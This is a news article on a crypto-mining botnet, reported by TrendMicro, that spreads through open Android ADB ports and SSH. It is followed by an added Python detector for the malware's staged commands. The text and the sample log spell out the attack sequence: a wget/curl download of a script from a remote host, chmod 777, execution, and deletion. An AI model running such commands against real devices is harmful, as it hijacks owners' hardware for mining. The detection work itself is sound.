TrendMicro, a Japan-based cyber security and defense company, has discovered a new cryptocurrency mining malware that takes advantage of open Android Debug Bridge (ADB) ports, a debugging interface used to troubleshoot apps installed on Android phones and tablets. Although the malware targets Android devices, it can spread to other devices such as Internet of Things (IoT) gadgets, according to Coindesk's report of June 23, 2019.
Mining Malware Detected in 21 Countries, Rampant in South Korea
Per the report, TrendMicro has discovered a new cryptocurrency mining botnet malware whose activity has been detected in 21 countries, with South Korea the most affected. The malware enters a user's Android phone or tablet through open ADB ports, since ADB does not require any authentication by default before an installation is made.
Once it has hijacked the user's phone, the malware can potentially spread to other electronic devices over the device's Secure Shell (SSH) connections. SSH allows a mobile phone or tablet to connect to other devices such as IoT gadgets, and devices that have already established and authenticated a connection can reconnect automatically later without a second authentication.
Spreading Mechanism Abuses the Process of Making SSH Connections
Remarking on the latter, the cybersecurity company said: "The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections." As a result, the botnet can spread to other devices and hijack their resources to mine crypto assets.
Another capability of the crypto mining malware is that it tunes the host's memory by enabling huge pages. This makes more efficient use of the device's memory than the default configuration in order to support the mining activity and optimize mining output.
Operation of the Cryptocurrency Malware
In terms of the malware's activity, it first arrives through the open ADB port from the IP address 45[.]67[.]14[.]179, then changes the working directory to "/data/local/tmp" using the command shell. A wget command is then used to download the payload of three miners, with curl executed instead if wget is absent from the hijacked system.
A miner is then executed depending on which one the malware has determined is best suited to mining on the victim's device. The choice of miner depends on the system's hardware, processor type, manufacturer, and architecture.
The malware also runs the command chmod 777 a.sh to change the permission settings so that the dropped script can be executed on the host. It can also cover its tracks on the Android device with the command rm -rf a.sh*, which deletes the downloaded file.
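The command sequence described above can be turned into a simple staged detection rule. As an added example that is not from the TrendMicro report or this article, the following Python groups constructed ADB shell command log lines by source address and flags sources that walk through the staged indicators in order; the log format and the IP addresses are assumptions.

```python
import re
from collections import defaultdict

# Staged indicators drawn from the behaviour described above: the working
# directory, the wget/curl download, chmod 777 on the dropped script, and
# its deletion. Stages must be hit in this order to count.
STAGES = [
    ("workdir",  re.compile(r"\bcd\s+/data/local/tmp\b")),
    ("download", re.compile(r"\b(wget|curl)\b.*\ba\.sh\b")),
    ("chmod",    re.compile(r"\bchmod\s+777\s+a\.sh\b")),
    ("cleanup",  re.compile(r"\brm\s+-rf\s+a\.sh\*?")),
]

# Constructed sample log (assumed format: "<timestamp> <source_ip> <command>").
# Documentation-range IPs; the URL host is a placeholder, not a real payload.
SAMPLE_LOG = """\
2019-06-21T02:13:05Z 203.0.113.7 cd /data/local/tmp
2019-06-21T02:13:06Z 203.0.113.7 wget http://203.0.113.7/a.sh -O a.sh || curl http://203.0.113.7/a.sh -o a.sh
2019-06-21T02:13:09Z 203.0.113.7 chmod 777 a.sh
2019-06-21T02:13:10Z 203.0.113.7 sh a.sh
2019-06-21T02:13:12Z 203.0.113.7 rm -rf a.sh*
2019-06-21T09:41:00Z 192.0.2.10 cd /data/local/tmp
2019-06-21T09:41:03Z 192.0.2.10 ls -la
"""

def detect_adb_miner(log_lines, min_stages=3):
    """Return {source_ip: [matched stage names]} for every source whose
    commands hit at least `min_stages` of STAGES in sequence."""
    per_source = defaultdict(list)
    for line in log_lines:
        parts = line.strip().split(" ", 2)
        if len(parts) < 3:
            continue  # malformed or empty line
        _ts, src, cmd = parts
        per_source[src].append(cmd)

    hits = {}
    for src, cmds in per_source.items():
        matched, next_stage = [], 0
        for cmd in cmds:
            # Advance to the first not-yet-seen stage this command satisfies.
            for idx in range(next_stage, len(STAGES)):
                name, pattern = STAGES[idx]
                if pattern.search(cmd):
                    matched.append(name)
                    next_stage = idx + 1
                    break
        if len(matched) >= min_stages:
            hits[src] = matched
    return hits

if __name__ == "__main__":
    print(detect_adb_miner(SAMPLE_LOG.splitlines()))
```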